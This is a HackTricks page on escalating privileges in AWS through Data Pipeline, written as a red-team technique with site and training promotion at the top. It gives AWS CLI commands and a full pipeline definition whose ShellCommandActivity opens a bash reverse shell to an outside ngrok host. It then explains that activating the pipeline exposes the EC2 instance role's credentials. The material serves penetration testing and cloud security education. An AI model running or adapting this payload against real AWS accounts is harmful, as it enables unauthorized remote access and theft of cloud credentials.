AWS - Datapipeline Privesc
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
datapipeline
For more info about datapipeline check:
AWS - DataPipeline, CodePipeline & CodeCommit Enum
iam:PassRole, datapipeline:CreatePipeline, datapipeline:PutPipelineDefinition, datapipeline:ActivatePipeline
Users with these permissions can escalate privileges by creating a Data Pipeline whose activity runs arbitrary commands on an EC2 instance launched with the roles they are allowed to pass. First create an empty pipeline:

```bash
aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string
```
The call returns a pipeline id. The attacker then uploads a definition that launches an Ec2Resource and runs a ShellCommandActivity on it, here a reverse shell back to an attacker-controlled host:

```json
{
  "objects": [
    {
      "id": "CreateDirectory",
      "type": "ShellCommandActivity",
      "command": "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
      "runsOn": { "ref": "instance" }
    },
    {
      "id": "Default",
      "scheduleType": "ondemand",
      "failureAndRerunMode": "CASCADE",
      "name": "Default",
      "role": "assumable_datapipeline",
      "resourceRole": "assumable_datapipeline"
    },
    {
      "id": "instance",
      "name": "instance",
      "type": "Ec2Resource",
      "actionOnTaskFailure": "terminate",
      "actionOnResourceFailure": "retryAll",
      "maximumRetries": "1",
      "instanceType": "t2.micro",
      "securityGroups": ["default"],
      "role": "assumable_datapipeline",
      "resourceRole": "assumable_ec2_profile_instance"
    }
  ]
}
```
note
The `role` and `resourceRole` of the Default object and the `role` of the Ec2Resource object (`assumable_datapipeline` above) must be roles whose trust policy allows datapipeline.amazonaws.com to assume them. The `resourceRole` of the Ec2Resource object (`assumable_ec2_profile_instance` above) must be a role that trusts ec2.amazonaws.com and has an EC2 instance profile, because it is attached to the launched instance.
Moreover, the shell lands on the EC2 instance, which only holds credentials for its own instance profile role (the Ec2Resource's `resourceRole`), so that is the only role whose credentials you can steal from the instance metadata; the Data Pipeline service role is used by the service itself, not exposed on the instance.
```bash
aws datapipeline put-pipeline-definition --pipeline-id <pipeline-id> \
  --pipeline-definition file:///pipeline/definition.json
```
The attacker-crafted definition can both launch resources (the Ec2Resource) and execute commands (the ShellCommandActivity) using the passed roles, so whatever the EC2 role is allowed to do becomes available from the reverse shell. Nothing runs until the pipeline is activated, which is why `datapipeline:ActivatePipeline` is in the permission set above: with `scheduleType` set to `ondemand`, activation is what triggers the instance launch and the command execution.
Potential Impact: Direct privesc to the EC2 role specified as the Ec2Resource's `resourceRole`.